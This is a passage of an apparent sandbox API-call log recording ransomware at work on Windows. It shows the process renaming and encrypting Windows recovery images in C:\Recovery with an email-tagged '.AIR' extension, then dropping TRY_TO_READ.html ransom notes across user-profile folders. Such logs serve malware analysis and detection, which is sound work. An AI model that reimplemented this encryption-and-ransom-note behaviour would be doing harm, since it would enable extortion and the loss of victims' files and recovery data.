	[0052.139] MoveFileExW (lpExistingFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0052.144] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c
	[0052.144] GetProcessHeap () returned 0x540000
	[0052.144] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.144] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=169213970) returned 1
	[0052.144] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa160012
	[0052.145] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0052.145] GetProcessHeap () returned 0x540000
	[0052.145] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b7f38
	[0052.145] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b7f38*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b7f38*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0052.145] WriteFile (in: hFile=0x44c, lpBuffer=0x5b7f38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b7f38*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0052.149] WriteFile (in: hFile=0x44c, lpBuffer=0x596760*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596760*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0052.149] WriteFile (in: hFile=0x44c, lpBuffer=0x596760*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596760*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.149] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3790020
	[0052.149] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3a20020
	[0052.150] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.150] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.200] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.200] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.200] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.200] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.215] SetFilePointer (in: hFile=0x44c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000
	[0052.215] WriteFile (in: hFile=0x44c, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.218] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.218] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.218] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.218] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.236] SetFilePointer (in: hFile=0x44c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000
	[0052.236] WriteFile (in: hFile=0x44c, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.239] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.239] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.239] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.239] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.257] SetFilePointer (in: hFile=0x44c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000
	[0052.257] WriteFile (in: hFile=0x44c, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.260] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.260] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.260] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.260] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.272] SetFilePointer (in: hFile=0x44c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000
	[0052.272] WriteFile (in: hFile=0x44c, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.274] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.274] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.275] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.275] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.286] SetFilePointer (in: hFile=0x44c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000
	[0052.287] WriteFile (in: hFile=0x44c, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.289] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.289] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.289] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.290] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.303] SetFilePointer (in: hFile=0x44c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000
	[0052.303] WriteFile (in: hFile=0x44c, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.306] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.306] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.306] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.306] ReadFile (in: hFile=0x44c, lpBuffer=0x3790020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.312] SetFilePointer (in: hFile=0x44c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000
	[0052.312] WriteFile (in: hFile=0x44c, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0052.315] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0052.315] WriteFile (in: hFile=0x44c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.315] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790020 | out: hHeap=0x540000) returned 1
	[0052.320] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20020 | out: hHeap=0x540000) returned 1
	[0052.372] CloseHandle (hObject=0x44c) returned 1
	[0052.731] GetProcessHeap () returned 0x540000
	[0052.732] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b7f38 | out: hHeap=0x540000) returned 1
	[0052.732] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b7e30 | out: hHeap=0x540000) returned 1
	[0052.732] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.732] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589800 | out: hHeap=0x540000) returned 1
	[0052.732] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0052.732] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589778
	[0052.732] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7e30
	[0052.732] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.732] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7e30 | out: pbBuffer=0x5b7e30) returned 1
	[0052.732] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596760 | out: pbBuffer=0x596760) returned 1
	[0052.732] SetFileAttributesW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", dwFileAttributes=0x80) returned 1
	[0052.732] lstrlenW (lpString="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 58
	[0052.732] GetProcessHeap () returned 0x540000
	[0052.732] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x5919d0
	[0052.733] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"
	[0052.733] lstrcatW (in: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.733] MoveFileExW (lpExistingFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0052.735] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c
	[0052.735] GetProcessHeap () returned 0x540000
	[0052.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.735] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=3170304) returned 1
	[0052.736] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x306000
	[0052.736] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0052.736] GetProcessHeap () returned 0x540000
	[0052.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b7f38
	[0052.736] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b7f38*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b7f38*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0052.736] WriteFile (in: hFile=0x44c, lpBuffer=0x5b7f38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b7f38*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0052.737] WriteFile (in: hFile=0x44c, lpBuffer=0x596760*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596760*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0052.737] WriteFile (in: hFile=0x44c, lpBuffer=0x596760*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596760*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0052.737] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x306000) returned 0x3a20020
	[0052.738] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x306000) returned 0x3d30020
	[0052.738] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0052.738] ReadFile (in: hFile=0x44c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x306000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x306000, lpOverlapped=0x0) returned 1
	[0053.023] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575820
	[0053.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.024] GetLastError () returned 0x0
	[0053.024] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0053.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.024] GetLastError () returned 0x0
	[0053.024] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1
	[0053.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.024] GetLastError () returned 0x0
	[0053.024] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579c70 | out: hHeap=0x540000) returned 1
	[0053.026] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.027] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.027] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.027] CloseHandle (hObject=0x450) returned 1
	[0053.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b788 | out: hHeap=0x540000) returned 1
	[0053.027] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0053.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.027] GetLastError () returned 0x0
	[0053.028] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.028] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0053.028] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.029] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.029] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.029] CloseHandle (hObject=0x450) returned 1
	[0053.029] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579c70 | out: hHeap=0x540000) returned 1
